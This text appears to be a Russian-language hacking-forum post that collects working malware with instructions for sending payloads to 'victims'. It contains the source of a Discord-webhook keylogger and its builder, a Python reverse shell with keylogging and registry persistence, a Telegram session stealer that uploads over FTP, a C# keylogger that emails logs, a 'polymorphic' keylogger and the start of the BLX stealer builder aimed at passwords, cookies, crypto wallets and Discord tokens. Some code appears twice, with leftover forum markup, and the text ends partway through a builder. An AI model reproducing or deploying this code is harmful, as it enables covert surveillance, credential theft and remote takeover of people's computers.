        max_len = ui.input(label='MaxLines len (default 10)', placeholder='u should enter 10').props('inline color=orange-3').classes('w-full')
        ui.button('Build', on_click=lambda: __makebuild(webh_url.value, max_len.value)).props("icon=build color=orange-3").classes('w-full')
        
def _translate(text):
    random_number = random.randint(0, 100000)
    name = f"translated_{random_number}.txt"
    with open(name, "w") as f:
        f.write(text)
        
    return name
        
def translate(text):
    name = _translate(text)
    os.startfile(name)
    
def _decoder():
    with ui.dialog().props('full-width') as dialog:
        with ui.card():
            content = ui.markdown()

    def handle_upload(e: events.UploadEventArguments):
        text = e.content.read().decode('utf-8')
        _converted = convert_text(text)
        content.set_content(_converted)
        translate(_converted)
    with ui.column():
        ui.label("Open your .cache file").classes('text-xl font-bold')
        with ui.row():
            ui.upload(on_upload=handle_upload, multiple=False, auto_upload=True).props('accept=.cache color=orange-3').classes('max-w-full centered')

with ui.tabs().classes('w-full center') as tabs:
    ui.tab('Home', icon='home')
    ui.tab('Decoder', icon='lock_open')

with ui.tab_panels(tabs, value='Home').classes('bg-transparent').classes('w-full center'):
    with ui.tab_panel('Home'):
        _home()
    with ui.tab_panel('Decoder'):
        _decoder()
            
def start_nicegui(**kwargs):
    ui.run(
        title=__title__,
        **kwargs
    )

if __name__ in {"__main__", "__mp_main__"}:
    DEBUG = False

    if DEBUG:
        ui.run()
    else:
        FlaskUI(
            server=start_nicegui,
            server_kwargs={"dark": True, "reload": False, "show": False, "port": 3000},
            width=500,
            height=650,
        ).run()

ezkey.pyw

from pynput import keyboard
from pynput import mouse

from discord_webhook import AsyncDiscordWebhook, DiscordWebhook, DiscordEmbed
import requests
import asyncio

import os
 
__author__ = "xpierroz"

discord_webhook = "xpierroz on top"

__r = requests.get('https://api.ipify.org/').text
__c = os.getenv('COMPUTERNAME')


async def _send_data():
    webhook = AsyncDiscordWebhook(
            url=discord_webhook,
            rate_limit_retry=True,
        )
            

    embed = DiscordEmbed(title='EZKey Grabber', description=f'Data from {__c} | {__r}', color='544C53')
    with open("MatPlot.cache", "rb") as f:
        webhook.add_file(file=f.read(), filename='fuck.cache')
    webhook.add_embed(embed)
    await webhook.execute(remove_embeds=True)
    webhook.remove_files()

class Logger():
    def __init__(self):
        self.__max_len_file = 10
        self.word = ""
        self.data = []
        #self.webhook = DiscordWebhook(
        #    url=discord_webhook,
        #    rate_limit_retry=True,
        #    content="New data"
        #)
            

    def send_data(self):
        asyncio.run(_send_data())
        return
        #embed = DiscordEmbed(title='EZKey Grabber', description=f'Data from {self.__c} | {self.__r}', color='544C53')
        #with open("MatPlot.cache", "rb") as f:
        #    self.webhook.add_file(file=f.read(), filename='fuck.cache')
        #self.webhook.add_embed(embed)
        #self.webhook.execute(remove_embeds=True)
        #self.webhook.remove_files()
        
    def erase_file(self):
        with open("MatPlot.cache", "w") as f:
            f.write("")
        
    def get_lenfile(self):
        with open("MatPlot.cache", "r") as f:
            return len(f.readlines())
        
    def convert_data(self):
        #Used to convert stuff like \x14 to CTRL4, you can see all the translations here
        # -> https://condor.depaul.edu/sjost/lsp121/documents/ascii-npr.htm
        # By the way don't forget that in most cases ^ is the CTRL key, but it can't still be used apart
        # and I have nothing to prevent that but I don't care just make a pr lol

        _data = []
        for elem in self.data:
            new_elem = ""
            for char in elem:
                if 0 <= ord(char) <= 31:
                    new_elem += " CTRL + " + chr(ord(char) + 64) + " "
                else:
                    new_elem += char
            _data.append(new_elem)

        
        int_dat = [] # Basic stuff to convert a str to int so if somebody opens this file he aint gonna understand
        for element in _data:
            encoded_bytes = element.encode()
            encoded_int = int.from_bytes(encoded_bytes, byteorder='big')
            int_dat.append(encoded_int)
            
        return int_dat       
        
    def write_data(self):
        _dat = self.convert_data()
        with open("MatPlot.cache", "a+") as f:
            for word in _dat:
                f.write(str(word)) # Might not need to convert to str but we neva know aight
                f.write(" ")
            f.write("\n")
        self.data = []
        
    def check_data(self):
        if len(self.data) > 10:
            self.write_data()
            if self.get_lenfile() > self.__max_len_file:
                self.send_data()
                self.erase_file()
            self.data = []
    
    def on_press(self, key):
        try:
            if key.char == " ":
                self.data.append(self.word)
                self.word = ""
            else:
                self.word += key.char
        except AttributeError:
            if key == keyboard.Key.backspace:
                self.word = self.word[:-1]
            if key == keyboard.Key.space or key == keyboard.Key.enter:
                self.data.append(self.word)
                self.word = ""
            elif key == keyboard.Key.ctrl_l:
                return
            elif not self.word == "":
                self.data.append(self.word)
        self.check_data()
            

    def on_mouse_press(self, *args):
        #print(*args)
        pass
    
logger = Logger()
listener = keyboard.Listener(
    on_press=logger.on_press)
listener.start()

listenerx = mouse.Listener(
    on_click=logger.on_mouse_press
)
listenerx.start()

while True:
    #print(logger.data)
    pass

 

Telegram Stealer v3.0
Stealer Telegram Session c обходом 2FA с использованием Python, переделанного в exe.
Отправляет через FTP сервер. Подобный скрипт уже есть выше, понравился чем-то, но пайтон интереснее.

В конце скрипта впишите FTP данные, можете воспользоваться FileZilla https://filezilla-project.org/.
Как жертва откроет, у себя на компе замените данные в Telegram Portable на присланные в архиве, папка tdata.

 

[Knew100]

Это reverse shell Python, поскольку предварительные команды рассчитаны на кражи файов и кейлогер, а такие аплоад любого файла, а также проверку административных привилегий, а также позволяет сделать скриншот, то решл добавить сюда.

Команды, разберётесь думаю:​

• quit
• background
• help
• cd
• clear
• upload
• download
• screenshot
• keylog_start
• keylog_dump
• keylog_stop
• persistence
• sendall

Не забудьте поставить свой ip в rev_shell.py

rev_shell.py​

import socket
import json
import subprocess
import time
import os
import pyautogui
import keylogger
import threading
import shutil
import sys

def reliable_send(data):
    jsondata = json.dumps(data)
    s.send(jsondata.encode())

def reliable_recv():
    data = ''
    while True:
        try:
            data = data + s.recv(1024).decode().rstrip()
            return json.loads(data)
        except ValueError:
            continue

def download_file(file_name):
    f = open(file_name, 'wb')
    s.settimeout(1)
    chunk = s.recv(1024)
    while chunk:
        f.write(chunk)
        try:
            chunk = s.recv(1024)
        except socket.timeout as e:
            break
    s.settimeout(None)
    f.close()

def upload_file(file_name):
    f = open(file_name, 'rb')
    s.send(f.read())

def screenshot():
    myScreenshot = pyautogui.screenshot()
    myScreenshot.save('screen.png')

def persist(reg_name, copy_name):
    file_location = os.environ['appdata'] + '\\' + copy_name
    try:
        if not os.path.exists(file_location):
            shutil.copyfile(sys.executable, file_location)
            subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ' + reg_name + ' /t REG_SZ /d "' + file_location + '"', shell=True)
            reliable_send('[+] Created Persistence With Reg Key: ' + reg_name)
        else:
            reliable_send('[+] Persistence Already Exists')
    except:
        reliable_send('[+] Error Creating Persistence With The Target Machine')

def connection():
    while True:
        time.sleep(20)
        try:
            s.connect(('192.168.1.4', 5555))
            shell()
            s.close()
            break
        except:
            connection()

def shell():
    while True:
        command = reliable_recv()
        if command == 'quit':
            break
        elif command == 'background':
            pass
        elif command == 'help':
            pass
        elif command == 'clear':
            pass
        elif command[:3] == 'cd ':
            os.chdir(command[3:])
        elif command[:6] == 'upload':
            download_file(command[7:])
        elif command[:8] == 'download':
            upload_file(command[9:])
        elif command[:10] == 'screenshot':
            screenshot()
            upload_file('screen.png')
            os.remove('screen.png')
        elif command[:12] == 'keylog_start':
            keylog = keylogger.Keylogger()
            t = threading.Thread(target=keylog.start)
            t.start()
            reliable_send('[+] Keylogger Started!')
        elif command[:11] == 'keylog_dump':
            logs = keylog.read_logs()
            reliable_send(logs)
        elif command[:11] == 'keylog_stop':
            keylog.self_destruct()
            t.join()
            reliable_send('[+] Keylogger Stopped!')
        elif command[:11] == 'persistence':
            reg_name, copy_name = command[12:].split(' ')
            persist(reg_name, copy_name)
        elif command[:7] == 'sendall':
            subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin = subprocess.PIPE)
        else:
            execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE)
            result = execute.stdout.read() + execute.stderr.read()
            result = result.decode()
            reliable_send(result)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection()

keylogger.py​

import os
from pynput.keyboard import Listener
import time
import threading


class Keylogger():
    keys = []
    count = 0
    flag = 0
    path = os.environ['appdata'] +'\\processmanager.txt'
    #path = 'processmanager.txt'

    def on_press(self, key):
        self.keys.append(key)
        self.count += 1

        if self.count >= 1:
            self.count = 0
            self.write_file(self.keys)
            self.keys = []

    def read_logs(self):
        with open(self.path, 'rt') as f:
            return f.read()

    def write_file(self, keys):
        with open(self.path, 'a') as f:
            for key in keys:
                k = str(key).replace("'", "")
                if k.find('backspace') > 0:
                    f.write(' Backspace ')
                elif k.find('enter') > 0:
                    f.write('\n')
                elif k.find('shift') > 0:
                    f.write(' Shift ')
                elif k.find('space') > 0:
                    f.write(' ')
                elif k.find('caps_lock') > 0:
                    f.write(' caps_lock ')
                elif k.find('Key'):
                    f.write(k)

    def self_destruct(self):
        self.flag = 1
        listener.stop()
        os.remove(self.path)

    def start(self):
        global listener
        with Listener(on_press=self.on_press) as listener:
            listener.join()

if __name__ == '__main__':
    keylog = Keylogger()
    t = threading.Thread(target=keylog.start)
    t.start()
    while keylog.flag != 1:
        time.sleep(10)
        logs = keylog.read_logs()
        print(logs)
        #keylog.self_destruct()
    t.join()

http://oju4yn237c6hjh42qothvpreqecnqjhtvh4sgn3fqmsdvhu5d5tyspid.onion/i/1h8f57f7j.gif

FUD KeyLogger Python полностью не обнаруживается, шифрует данные в INT, отправляет данные в Discord!

Запустите client.py и создайте полезную нагрузку
Затем полезная нагрузка (ezkey.pyw) будет модифицирована с вашим WebHook от Discord
Отредактируйте имя полезной нагрузки и скомпилируйте его, но это не обязательно
Отправьте полезную нагрузку своей жертве

Как только жертва выполнит полезную нагрузку, она запустит KeyLogger в фоновом режиме. Каждый ключ будет записан и сохранен на MatPlot.cache
Каждый раз, когда достигается maxlen var (выбираемый пользователем при создании полезной нагрузки), keylogger отправляет файл, содержащий данные через webhook
Данные будут зашифрованы в INT, поэтому их будет сложнее обнаружить, на сегодня 0/60 по шкале вирустотала

sudo apt install python3 && python3-pip
pip3 install requests asyncio flaskwebgui nicegui

client.py​

       from flaskwebgui import FlaskUI
from nicegui import ui, events

import random
import os

__title__ = "EZKey"

ui.colors(primary='#333')

def convert_text(text):
    string = ""
    for _encoded_int in text.split("\r\n"):
        for encoded_int in _encoded_int.split(" "):
            if encoded_int == "":
                continue
           
            decoded_bytes = int(str(encoded_int)).to_bytes((int(encoded_int).bit_length() + 7) // 8, byteorder='big')
            decoded_string = decoded_bytes.decode()

            string += f" {decoded_string}"
    return string

def __makebuild(webh_url, max_len):
    if webh_url == "":
        return ui.notify(f"Please enter a webhook url!", timeout=30, progress=True, color="red", position="top-left")
   
    ui.notify(f"Build is starting!", timeout=30, progress=True, color="orange", position="top-left")
   
    with open("ezkey.pyw", "r") as f:
        _ezkey = f.read()
       
    _ezkey = _ezkey.replace("discord_webhook = \"xpierroz on top\"", f"discord_webhook = \"{webh_url}\"")
    _ezkey = _ezkey.replace(
        "self.__max_len_file = 10", "self.__max_len_file = {}"
        .format(max_len if max_len != "" else 10
                )
        )
   
    with open("ezkey.pyw", "w") as f:
        f.write(_ezkey)
       
    ui.notify(f"Build has finished!", timeout=30, progress=True, color="green", position="top-left")

def _home():
    ui.label("EZKey Builder").classes('text-center text-xl font-bold')
   
    with ui.column():
        webh_url = ui.input(label='WebHook URL', placeholder='EZKey my g').props('inline color=orange-3').classes('w-full')
        max_len = ui.input(label='MaxLines len (default 10)', placeholder='u should enter 10').props('inline color=orange-3').classes('w-full')
        ui.button('Build', on_click=lambda: __makebuild(webh_url.value, max_len.value)).props("icon=build color=orange-3").classes('w-full')
       
def _translate(text):
    random_number = random.randint(0, 100000)
    name = f"translated_{random_number}.txt"
    with open(name, "w") as f:
        f.write(text)
       
    return name
       
def translate(text):
    name = _translate(text)
    os.startfile(name)
   
def _decoder():
    with ui.dialog().props('full-width') as dialog:
        with ui.card():
            content = ui.markdown()

    def handle_upload(e: events.UploadEventArguments):
        text = e.content.read().decode('utf-8')
        _converted = convert_text(text)
        content.set_content(_converted)
        translate(_converted)
    with ui.column():
        ui.label("Open your .cache file").classes('text-xl font-bold')
        with ui.row():
            ui.upload(on_upload=handle_upload, multiple=False, auto_upload=True).props('accept=.cache color=orange-3').classes('max-w-full centered')

with ui.tabs().classes('w-full center') as tabs:
    ui.tab('Home', icon='home')
    ui.tab('Decoder', icon='lock_open')

with ui.tab_panels(tabs, value='Home').classes('bg-transparent').classes('w-full center'):
    with ui.tab_panel('Home'):
        _home()
    with ui.tab_panel('Decoder'):
        _decoder()
           
def start_nicegui(**kwargs):
    ui.run(
        title=__title__,
        **kwargs
    )

if __name__ in {"__main__", "__mp_main__"}:
    DEBUG = False

    if DEBUG:
        ui.run()
    else:
        FlaskUI(
            server=start_nicegui,
            server_kwargs={"dark": True, "reload": False, "show": False, "port": 3000},
            width=500,
            height=650,
        ).run()
   
[HEADING=1][B]ezkey.pyw[/B][/HEADING]
     
[CODE=python]from pynput import keyboard
from pynput import mouse

from discord_webhook import AsyncDiscordWebhook, DiscordWebhook, DiscordEmbed
import requests
import asyncio

import os
 
__author__ = "xpierroz"

discord_webhook = "xpierroz on top"

__r = requests.get('https://api.ipify.org/').text
__c = os.getenv('COMPUTERNAME')


async def _send_data():
    webhook = AsyncDiscordWebhook(
            url=discord_webhook,
            rate_limit_retry=True,
        )
            

    embed = DiscordEmbed(title='EZKey Grabber', description=f'Data from {__c} | {__r}', color='544C53')
    with open("MatPlot.cache", "rb") as f:
        webhook.add_file(file=f.read(), filename='fuck.cache')
    webhook.add_embed(embed)
    await webhook.execute(remove_embeds=True)
    webhook.remove_files()

class Logger():
    def __init__(self):
        self.__max_len_file = 10
        self.word = ""
        self.data = []
        #self.webhook = DiscordWebhook(
        #    url=discord_webhook,
        #    rate_limit_retry=True,
        #    content="New data"
        #)
            

    def send_data(self):
        asyncio.run(_send_data())
        return
        #embed = DiscordEmbed(title='EZKey Grabber', description=f'Data from {self.__c} | {self.__r}', color='544C53')
        #with open("MatPlot.cache", "rb") as f:
        #    self.webhook.add_file(file=f.read(), filename='fuck.cache')
        #self.webhook.add_embed(embed)
        #self.webhook.execute(remove_embeds=True)
        #self.webhook.remove_files()
        
    def erase_file(self):
        with open("MatPlot.cache", "w") as f:
            f.write("")
        
    def get_lenfile(self):
        with open("MatPlot.cache", "r") as f:
            return len(f.readlines())
        
    def convert_data(self):
        #Used to convert stuff like \x14 to CTRL4, you can see all the translations here
        # -> https://condor.depaul.edu/sjost/lsp121/documents/ascii-npr.htm
        # By the way don't forget that in most cases ^ is the CTRL key, but it can't still be used apart
        # and I have nothing to prevent that but I don't care just make a pr lol

        _data = []
        for elem in self.data:
            new_elem = ""
            for char in elem:
                if 0 <= ord(char) <= 31:
                    new_elem += " CTRL + " + chr(ord(char) + 64) + " "
                else:
                    new_elem += char
            _data.append(new_elem)

        
        int_dat = [] # Basic stuff to convert a str to int so if somebody opens this file he aint gonna understand
        for element in _data:
            encoded_bytes = element.encode()
            encoded_int = int.from_bytes(encoded_bytes, byteorder='big')
            int_dat.append(encoded_int)
            
        return int_dat       
        
    def write_data(self):
        _dat = self.convert_data()
        with open("MatPlot.cache", "a+") as f:
            for word in _dat:
                f.write(str(word)) # Might not need to convert to str but we neva know aight
                f.write(" ")
            f.write("\n")
        self.data = []
        
    def check_data(self):
        if len(self.data) > 10:
            self.write_data()
            if self.get_lenfile() > self.__max_len_file:
                self.send_data()
                self.erase_file()
            self.data = []
    
    def on_press(self, key):
        try:
            if key.char == " ":
                self.data.append(self.word)
                self.word = ""
            else:
                self.word += key.char
        except AttributeError:
            if key == keyboard.Key.backspace:
                self.word = self.word[:-1]
            if key == keyboard.Key.space or key == keyboard.Key.enter:
                self.data.append(self.word)
                self.word = ""
            elif key == keyboard.Key.ctrl_l:
                return
            elif not self.word == "":
                self.data.append(self.word)
        self.check_data()
            

    def on_mouse_press(self, *args):
        #print(*args)
        pass
    
logger = Logger()
listener = keyboard.Listener(
    on_press=logger.on_press)
listener.start()

listenerx = mouse.Listener(
    on_click=logger.on_mouse_press
)
listenerx.start()

while True:
    #print(logger.data)
    pass

​

Telegram Stealer v3.0​

Stealer Telegram Session c обходом 2FA с использованием Python, переделанного в exe.
Отправляет через FTP сервер. Подобный скрипт уже есть выше, понравился чем-то, но пайтон интереснее.

В конце скрипта впишите FTP данные, можете воспользоваться FileZilla https://filezilla-project.org/.
Как жертва откроет, у себя на компе замените данные в Telegram Portable на присланные в архиве, папка tdata.

Vectr_v3.0.py​

import os
import os.path
import shutil
import glob
from datetime import datetime
from ftplib import FTP
from zipfile import ZipFile

now = datetime.now()
name_archive = str(now.strftime("%d_%m_%y_%I_%M"))

# Get current user home
pathusr = os.path.expanduser('~')
# Set tdata folder location
tdata_path = pathusr + '\\AppData\\Roaming\\Telegram Desktop\\tdata\\'
tdata_session_zip = pathusr + '\\AppData\\Roaming\\Telegram Desktop\\' + name_archive + ".zip"

# Creating folders
os.mkdir(tdata_path + '\\connection_hash')
os.mkdir(tdata_path + '\\map')

# Copy all session folders
folders = [folder for folder in os.listdir(tdata_path) if len(folder) >= 15 and os.path.isdir(os.path.join(tdata_path, folder))]
for folder in folders:
    shutil.copytree(os.path.join(tdata_path, folder), os.path.join(tdata_path, 'map', folder))

# Copying files (+usertag)
files16 = glob.iglob(os.path.join(tdata_path, "??????????*"))
usertag_file = os.path.join(tdata_path, "usertag")
files16 = [usertag_file] + list(files16)
for file in files16:
    if os.path.isfile(file):
        shutil.copy2(file, tdata_path + '\\connection_hash')

#Key_data
key_data = glob.iglob(os.path.join(tdata_path , "key_datas"))
for file in key_data:
    if os.path.isfile(file):
        shutil.copy2(file, tdata_path + '\\connection_hash')

#Archivation folders
with ZipFile(pathusr + '\\AppData\\Roaming\\Telegram Desktop\\session.zip','w') as zipObj:
   # Iterate over all the files in directory
   for folderName, subfolders, filenames in os.walk(pathusr + '\\AppData\\Roaming\\Telegram Desktop\\tdata\\map'):
       for filename in filenames:
           #create complete filepath of file in directory
           filePath = os.path.join(folderName, filename)
           # Add file to zip
           zipObj.write(filePath)

   for folderName, subfolders, filenames in os.walk(pathusr + '\\AppData\\Roaming\\Telegram Desktop\\tdata\\connection_hash'):
       for filename in filenames:
           #create complete filepath of file in directory
           filePath = os.path.join(folderName, filename)
           # Add file to zip
           zipObj.write(filePath)

shutil.rmtree(tdata_path + '\\connection_hash')
shutil.rmtree(tdata_path + '\\map')

old_file = os.path.join(pathusr + '\\AppData\\Roaming\\Telegram Desktop\\', 'session.zip')
new_file = os.path.join(pathusr + '\\AppData\\Roaming\\Telegram Desktop\\' , name_archive + ".zip")
os.rename(old_file, new_file)

# FTP module to connect server
ftp = FTP()
ftp.set_debuglevel(2)
ftp.connect('Host_Name', 21)
ftp.login('User_Name', 'Password')
ftp.cwd('/htdocs/tgtest')

# Sending file on FTP server
print(ftp.dir())
fp = open(tdata_session_zip, 'rb')
ftp.storbinary('STOR %s' % os.path.basename(name_archive + ".zip"), fp, 1024)
fp.close()

KeyLogger написан в C#: используется, чтобы перехватить события клавиатуры и записать клавиши в файл журнала
Как только файл журнала достигает определенного размера, программа архивирует файл журнала и отправляет его по электронной почте с помощью SMTP на примере Gmail, вы можете установить SMTP сервер по своим предпочтениям

code.cs​

using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
using System.Windows.Forms;

namespace Keylogger
{
    class Program
    {
        private const int WH_KEYBOARD_LL = 13;
        private const int WM_KEYDOWN = 0x0100;

        private static LowLevelKeyboardProc _proc = HookCallback;
        private static IntPtr _hookID = IntPtr.Zero;
        private static StringBuilder _sb = new StringBuilder();

        private static string _logFilePath = "log.txt";
        private static long _maxLogSize = 1024 * 1024; // 1 MB

        static void Main(string[] args)
        {
            _hookID = SetHook(_proc);

            try
            {
                Application.Run();
            }
            finally
            {
                UnhookWindowsHookEx(_hookID);
            }
        }

        private static IntPtr SetHook(LowLevelKeyboardProc proc)
        {
            using (var curProcess = System.Diagnostics.Process.GetCurrentProcess())
            using (var curModule = curProcess.MainModule)
            {
                return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0);
            }
        }

        private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
        {
            if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
            {
                int vkCode = Marshal.ReadInt32(lParam);
                _sb.Append((Keys)vkCode);

                if (_sb.Length > _maxLogSize)
                {
                    ArchiveLog();
                }
            }

            return CallNextHookEx(_hookID, nCode, wParam, lParam);
        }

        private static void ArchiveLog()
        {
            var archivePath = Path.Combine(Path.GetDirectoryName(_logFilePath), "log_" + DateTime.Now.ToString("yyyyMMddHHmmss") + ".txt");
            File.Move(_logFilePath, archivePath);
            SendLog(archivePath);
            _sb.Clear();
        }

        private static void SendLog(string filePath)
        {
            try
            {
                var smtpClient = new System.Net.Mail.SmtpClient("smtp.gmail.com", 587);
                smtpClient.EnableSsl = true;
                smtpClient.Credentials = new System.Net.NetworkCredential("youremail@gmail.com", "yourpassword");

                var mailMessage = new System.Net.Mail.MailMessage();
                mailMessage.From = new System.Net.Mail.MailAddress("youremail@gmail.com");
                mailMessage.To.Add("recipientemail@gmail.com");
                mailMessage.Subject = "Keylogger Log";
                mailMessage.Body = "Please find attached the log file.";
                mailMessage.Attachments.Add(new System.Net.Mail.Attachment(filePath));

                smtpClient.Send(mailMessage);
            }
            catch (Exception ex)
            {
                // Handle the exception
            }
        }

[DllImport("user32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]

Polymorphic Keylogger

Python KeyLogger включает полиморфные стратегии, чтобы избежать обнаружения систем безопасности, как и у всех скриптов захватывает клавиши, но шифрует их с использованием динамически сгенерированных ключей, а также обфусцирует свой собственный код, чтобы избежать детектов.

Захватывает клавиши в целевой системе.
Реализует полиморфные методы, чтобы динамически изменять поведение и структуру.
Шифрует захваченные клавишные клавиши, используя случайно сгенерированный ключ.
Обфусцирует код KeyLogger, чтобы уклониться от обнаружения.
Хранит зашифрованные клавишные клавиши для последующего анализа.

Polymorphic_Keylogger_Basic.py​

import random

# Generate a random key for encryption
def generate_key():
    key = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for _ in range(10))
    return key

# Encrypt the captured keystrokes using the generated key
def encrypt(keystrokes, key):
    encrypted_keystrokes = ""
    for char in keystrokes:
        encrypted_keystrokes += chr(ord(char) ^ ord(key))
    return encrypted_keystrokes

# Obfuscate the keylogger code
def obfuscate_code():
    # Code obfuscation techniques can be applied here
    # This can include renaming variables and functions, adding junk code, using encoding/decoding techniques, etc.
    pass

# Main keylogger functionality
def keylogger():
    keystrokes = ""
    key = generate_key()

    while True:
        # Capture keystrokes
        keystroke = capture_keystroke()

        # Perform polymorphic operations
        obfuscate_code()
        key = generate_key()

        # Encrypt and store keystrokes
        encrypted_keystrokes = encrypt(keystroke, key)
        store_keystrokes(encrypted_keystrokes)

# Entry point
if __name__ == "__main__":
    keylogger()

Multi_Platform_keylogger.py​

import random
import platform
import os

# Generate a random key for encryption
def generate_key():
    key = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for _ in range(10))
    return key

# Encrypt the captured keystrokes using the generated key
def encrypt(keystrokes, key):
    encrypted_keystrokes = ""
    for char in keystrokes:
        encrypted_keystrokes += chr(ord(char) ^ ord(key))
    return encrypted_keystrokes

# Obfuscate the keylogger code
def obfuscate_code():
    # Code obfuscation techniques can be applied here
    # This can include renaming variables and functions, adding junk code, using encoding/decoding techniques, etc.
    pass

# Capture keystrokes based on the platform
def capture_keystroke():
    system = platform.system()
    if system == "Windows":
        import msvcrt
        return msvcrt.getch().decode()
    elif system == "Linux" or system == "Darwin":
        import termios
        import sys
        import tty
        fd = sys.stdin.fileno()
        old_settings = termios.tcgetattr(fd)
        try:
            tty.setraw(sys.stdin.fileno())
            ch = sys.stdin.read(1)
        finally:
            termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
        return ch
    else:
        raise Exception("Unsupported platform")

# Store keystrokes based on the platform
def store_keystrokes(keystrokes):
    system = platform.system()
    if system == "Windows":
        file_path = "keystrokes.txt"
        with open(file_path, "a") as file:
            file.write(keystrokes)
            file.write("\n")
    elif system == "Linux" or system == "Darwin":
        file_path = os.path.expanduser("~/keystrokes.txt")
        with open(file_path, "a") as file:
            file.write(keystrokes)
            file.write("\n")
    else:
        raise Exception("Unsupported platform")

# Main keylogger functionality
def keylogger():
    keystrokes = ""
    key = generate_key()

    while True:
        try:
            # Capture keystrokes
            keystroke = capture_keystroke()

            # Perform polymorphic operations
            obfuscate_code()
            key = generate_key()

            # Encrypt and store keystrokes
            encrypted_keystrokes = encrypt(keystroke, key)
            store_keystrokes(encrypted_keystrokes)

        except Exception as e:
            # Handle any exceptions gracefully
            print(f"Error: {str(e)}")
            continue

# Entry point
if __name__ == "__main__":
    keylogger()

BLX Stealer Python​

• Все cookie и пароли браузеров
• Специальные файлы
• Учётные записи Steam, Riot и Telegram
• Metamask, Phantom, Binance, Coinbase, Exodus, Atomic и Trust wallet
• Token Grabber из Canary Discord, Better Discord, Discord в браузерах и Discord приложения
• Грабер HQ Friends, Email, Phone Number и Token
• Имеет инъекцию
• Отправляет через Webhook Discord

sudo apt install python3 && python3-pip
pip3 install requests pycryptodome pystyle colorama auto_py_to_exe pyinstaller wmi
python3 builder.py

builder.py​

from pystyle import *
import os
import subprocess
import requests
from colorama import *
import time

os.system('clear' if os.name == 'posix' else 'cls')

intro = """
 ▄▄▄▄     ██▓   ▒██   ██▒      ██████ ▄▄▄█████▓ ▓█████ ▄▄▄       ██▓    ▓█████ ██▀███
▓█████▄  ▓██▒   ▒▒ █ █ ▒░    ▒██    ▒ ▓  ██▒ ▓▒ ▓█   ▀▒████▄    ▓██▒    ▓█   ▀▓██ ▒ ██▒
▒██▒ ▄██ ▒██░   ░░  █   ░    ░ ▓██▄   ▒ ▓██░ ▒░ ▒███  ▒██  ▀█▄  ▒██░    ▒███  ▓██ ░▄█ ▒
▒██░█▀   ▒██░    ░ █ █ ▒       ▒   ██▒░ ▓██▓ ░  ▒▓█  ▄░██▄▄▄▄██ ▒██░    ▒▓█  ▄▒██▀▀█▄
░▓█  ▀█▓▒░██████▒██▒ ▒██▒    ▒██████▒▒  ▒██▒ ░ ▒░▒████▒▓█   ▓██▒░██████▒░▒████░██▓ ▒██▒
░▒▓███▀▒░░ ▒░▓  ▒▒ ░ ░▓ ░    ▒ ▒▓▒ ▒ ░  ▒ ░░   ░░░ ▒░ ░▒▒   ▓▒█░░ ▒░▓  ░░░ ▒░ ░ ▒▓ ░▒▓░
▒░▒   ░ ░░ ░ ▒  ░░   ░▒ ░    ░ ░▒  ░ ░    ░    ░ ░ ░  ░ ░   ▒▒ ░░ ░ ▒  ░ ░ ░    ░▒ ░ ▒
 ░    ░    ░ ░   ░    ░      ░  ░  ░    ░          ░    ░   ▒     ░ ░      ░    ░░   ░
 ░      ░    ░   ░    ░            ░           ░   ░        ░  ░    ░  ░   ░     ░   
                       Enter                                       
"""

Anime.Fade(Center.Center(intro), Colors.black_to_red, Colorate.Vertical, interval=0.035, enter=True)


print(f"""{Fore.LIGHTRED_EX}
 ▄▄▄▄     ██▓   ▒██   ██▒      ██████ ▄▄▄█████▓ ▓█████ ▄▄▄       ██▓    ▓█████ ██▀███
▓█████▄  ▓██▒   ▒▒ █ █ ▒░    ▒██    ▒ ▓  ██▒ ▓▒ ▓█   ▀▒████▄    ▓██▒    ▓█   ▀▓██ ▒ ██▒
▒██▒ ▄██ ▒██░   ░░  █   ░    ░ ▓██▄   ▒ ▓██░ ▒░ ▒███  ▒██  ▀█▄  ▒██░    ▒███  ▓██ ░▄█ ▒
▒██░█▀   ▒██░    ░ █ █ ▒       ▒   ██▒░ ▓██▓ ░  ▒▓█  ▄░██▄▄▄▄██ ▒██░    ▒▓█  ▄▒██▀▀█▄
░▓█  ▀█▓▒░██████▒██▒ ▒██▒    ▒██████▒▒  ▒██▒ ░ ▒░▒████▒▓█   ▓██▒░██████▒░▒████░██▓ ▒██▒
░▒▓███▀▒░░ ▒░▓  ▒▒ ░ ░▓ ░    ▒ ▒▓▒ ▒ ░  ▒ ░░   ░░░ ▒░ ░▒▒   ▓▒█░░ ▒░▓  ░░░ ▒░ ░ ▒▓ ░▒▓░
▒░▒   ░ ░░ ░ ▒  ░░   ░▒ ░    ░ ░▒  ░ ░    ░    ░ ░ ░  ░ ░   ▒▒ ░░ ░ ▒  ░ ░ ░    ░▒ ░ ▒
 ░    ░    ░ ░   ░    ░      ░  ░  ░    ░          ░    ░   ▒     ░ ░      ░    ░░   ░
 ░      ░    ░   ░    ░            ░           ░   ░        ░  ░    ░  ░   ░     ░   

""")

time.sleep(2)


while True:
 
    Write.Print("\nWhich option do you want to choose: ", Colors.red)
    Write.Print("\n1. Build .exe", Colors.red)
    Write.Print("\n2. Build FUD .exe", Colors.red)
    Write.Print("\n3. Close Builder", Colors.red)
    Write.Print("\nMake your selection: ", Colors.red, end="")
    choice = input()

    if choice == "1":
        os.system("cls || clear")
        webhook = input(Fore.RED + "\nEnter Your Webhook: " + Style.RESET_ALL)

        filename = "blxstealer.py"
        filepath = os.path.join(os.getcwd(), filename)
        with open(filepath, "r", encoding="utf-8") as f:
            content = f.read()
        new_content = content.replace('"YOUR WEBHOOK HERE"', f'"{webhook}"')
        with open(filepath, "w", encoding="utf-8") as f:
            f.write(new_content)
        Write.Print(f"\n{filename} file updated.", Colors.red)

        obfuscate = False

        while True:
            answer = input(Fore.CYAN + "\nDo you want to make exe file? (Y/N) " + Style.RESET_ALL)
            if answer.upper() == "Y":
                if not obfuscate:
